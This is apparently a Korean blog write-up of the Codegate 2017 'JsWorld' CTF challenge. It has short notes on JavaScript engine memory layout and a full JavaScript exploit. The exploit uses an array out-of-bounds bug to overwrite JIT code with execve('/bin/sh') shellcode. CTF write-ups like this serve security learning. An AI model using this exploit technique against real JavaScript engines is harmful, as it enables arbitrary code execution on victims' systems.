Pwnable/CTF
Codegate 2017 JsWorld
HSr00t
2018. 5. 10. 17:00
b*js::math_atan vp=(주소)
주소 + 2(qword)를 하면 인자 주소가 나온다
JS:array는 int ?? + int rel_size + int?? int_length_size + data가 들어감. relsize옆에 데이터를 가르키는 주소가 있음
winmerge 프로그램으로 소스 비교하면서 취약점 찾을수있음
아래 주소에 모든 것이 들어가 있다..
참고: https://bpsecblog.wordpress.com/2017/04/27/javascript_engine_array_oob/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 | function d_to_i2(d){ var a = new Uint32Array(new Float64Array([d]).buffer); return [a[1], a[0]]; } function i2_to_d(x){ return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0]; } function i2_to_hex(i2){ var v1 = ("00000000" + i2[0].toString(16)).substr(-8); var v2 = ("00000000" + i2[1].toString(16)).substr(-8); return [v1,v2]; } function p_i2(d){ return (i2_to_hex(d_to_i2(d))[0]+i2_to_hex(d_to_i2(d))[1]) } function jit_read(data1,data2) { print('\nABCD') } var a = new Array(1); a[0] = 0x41414141; var uint = new Uint32Array(1000); for(var i =0;i<1000;i++) { uint[i] = 1000; } a.pop(); a.pop(); for(var i=0;;i++) { if(a[i]==1000) { break } } uo = i; //uint_offset print('\n'); for(var j=0;j<500;j++) { jit_read('A','B'); } var idx = 0; for(var j=0;;j++) { if(p_i2(a[j])=='0000018000000191') { idx = j; break; } } uint_data = p_i2(a[uo+2]); var shell = new Uint32Array(27); shell = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"; print('\n'); jit = p_i2(a[idx-2]); a[uo+2] = (a[idx-2]); //uint data -> jit address print('Jit: '+jit); print('uint data: '+uint_data); var hex = ''; var temp = ''; var idx = 0; for(var i=0;i<shell.length;i+=4) { hex = ''; for(var j=0;j<4;j++) { //uint32_t == 4byte if(shell[i+j]!=undefined) hex+=(shell.charCodeAt(i+j).toString(16)); } hex = hex.split(''); temp = ''; for(var j=0;j<8;j+=2) { temp += hex[hex.length-j-2] + hex[hex.length-j-1]; } uint[idx] = parseInt('0x'+temp); idx+=1; } uint[idx-1] = 0x050f3b; jit_read('A','B'); //Math.atan(a); | cs |